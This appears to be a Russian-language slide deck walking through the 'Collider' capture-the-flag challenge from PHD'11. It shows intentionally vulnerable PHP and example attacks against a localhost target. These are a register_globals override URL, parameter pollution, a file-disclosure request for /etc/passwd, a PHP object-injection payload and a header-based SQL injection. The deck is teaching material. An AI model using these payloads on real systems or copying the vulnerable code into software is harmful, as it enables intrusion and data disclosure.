Download to read offline
![Register Globals (#1)
Конфигурационный файл php.ini
register_globals = On
Изменение типа переменных скрипта
…
$u1['OTP']='OTP_'.$f3;/*
…
*/ if(is_array($n3)){foreach($n3 as $s1=>$l2){$x0[$s1]=$l2;}}if(isset($_REQUEST['pswd'])){
$j3=trim($_REQUEST['pswd']);if($j3==$u1['OTP']){print"FLAGHERE";}else{print"<script>alert('Failed')</script>";}}
Function
….
Предположения?](https://image.slidesharecdn.com/collider-120403100651-phpapp02/75/Collider-3-2048.jpg)
![Register Globals (#1)
http://localhost/cld/crypt.php?u1=O&pswd=O
if($j3==$u1['OTP']){print"FLAGHERE";}](https://image.slidesharecdn.com/collider-120403100651-phpapp02/75/Collider-4-2048.jpg)
![HTTP Parameter Pollution (#2)
Ищем “FLAGHERE” – видим mysql_count()
function collider_debug(){if(!is_numeric($_REQUEST['debug'])&&is_numeric($_REQUEST['phpver']))
….
if(is_numeric($_GET['debug'])&&isset($_GET['phpver'])){if($_GET['phpver']===phpversion())
….
print mysql_count("collider","debug");
Предложения?
http://raz0r.name/articles/http-parameter-pollution/](https://image.slidesharecdn.com/collider-120403100651-phpapp02/75/Collider-5-2048.jpg)
![Local File Disclosure (#3)
Ищем “FLAGHERE” – больше не работает
…
function folowe($z1){$z1=str_replace(".","",$z1);if(file_exists($z1)){readfile($z1);}}
…
if(get_plain()){if(isset($_GET['op'])&&!empty($_GET['op'])){$w1=htmlspecialchars($_GET['op']);folowe($w1);
…
function get_plain(){if((isset($_REQUEST['permission']))&&($_REQUEST['permission']==$y1)){return 1;}
Предложения?](https://image.slidesharecdn.com/collider-120403100651-phpapp02/75/Collider-7-2048.jpg)
![Serialialise (#4)
$sessid = unserialize($_COOKIE['guest']);
class Collider_LO {
…
function __destruct()
…
$var = $this->shutdown[0];
$arg = $this->shutdown[1];
$var($arg);
...
Предложения?
https://rdot.org/forum/showthread.php?t=950 by BlackFan](https://image.slidesharecdn.com/collider-120403100651-phpapp02/75/Collider-9-2048.jpg)
![SQL Injection (#5)
SQL injection? Опять?
… $_REQUEST['notbanned']) {
$phd = $_SERVER['HTTP_PHD'];
…
$result=mysql_query("select id,phd,id as i,phd as p from status where id =$phd")
…
Предложения? ](https://image.slidesharecdn.com/collider-120403100651-phpapp02/75/Collider-11-2048.jpg)
Collider
- 1. Collider! challenge (мастер-класс)
- 2. Сервис Collider Сервис хак-квеста PHD’11 - Collider. Как проходить? • crypt.php + (Ctrl+F “FLAGHERE”) Краткое содержание ситкома: • Register Globals • HTTP Parameter Pollution • Local File Disclosure • Сериализация • SQL Injection
- 3. Register Globals (#1) Конфигурационный файл php.ini register_globals = On Изменение типа переменных скрипта … $u1['OTP']='OTP_'.$f3;/* … */ if(is_array($n3)){foreach($n3 as $s1=>$l2){$x0[$s1]=$l2;}}if(isset($_REQUEST['pswd'])){ $j3=trim($_REQUEST['pswd']);if($j3==$u1['OTP']){print"FLAGHERE";}else{print"<script>alert('Failed')</script>";}} Function …. Предположения?
- 4. Register Globals (#1) http://localhost/cld/crypt.php?u1=O&pswd=O if($j3==$u1['OTP']){print"FLAGHERE";}
- 5. HTTP Parameter Pollution(#2) Ищем “FLAGHERE” – видим mysql_count() function collider_debug(){if(!is_numeric($_REQUEST['debug'])&&is_numeric($_REQUEST['phpver'])) …. if(is_numeric($_GET['debug'])&&isset($_GET['phpver'])){if($_GET['phpver']===phpversion()) …. print mysql_count("collider","debug"); Предложения? http://raz0r.name/articles/http-parameter-pollution/
- 6.
- 7. Local File Disclosure(#3) Ищем “FLAGHERE” – больше не работает … function folowe($z1){$z1=str_replace(".","",$z1);if(file_exists($z1)){readfile($z1);}} … if(get_plain()){if(isset($_GET['op'])&&!empty($_GET['op'])){$w1=htmlspecialchars($_GET['op']);folowe($w1); … function get_plain(){if((isset($_REQUEST['permission']))&&($_REQUEST['permission']==$y1)){return 1;} Предложения?
- 8. Local File Disclosure(#3) http://localhost/cld/?permission=&op=/etc/passwd
- 9. Serialialise (#4) $sessid = unserialize($_COOKIE['guest']); class Collider_LO { … function __destruct() … $var = $this->shutdown[0]; $arg = $this->shutdown[1]; $var($arg); ... Предложения? https://rdot.org/forum/showthread.php?t=950 by BlackFan
- 10. Serialialise (#4) O:11:"Collider_LO":2:{s:3:"res";N;s:8:"collider";a:2: {i:0;s:7:"phpinfo";i:1;i:-1;}}
- 11. SQL Injection (#5) SQL injection? Опять? … $_REQUEST['notbanned']) { $phd = $_SERVER['HTTP_PHD']; … $result=mysql_query("select id,phd,id as i,phd as p from status where id =$phd") … Предложения?
- 12.
- 13.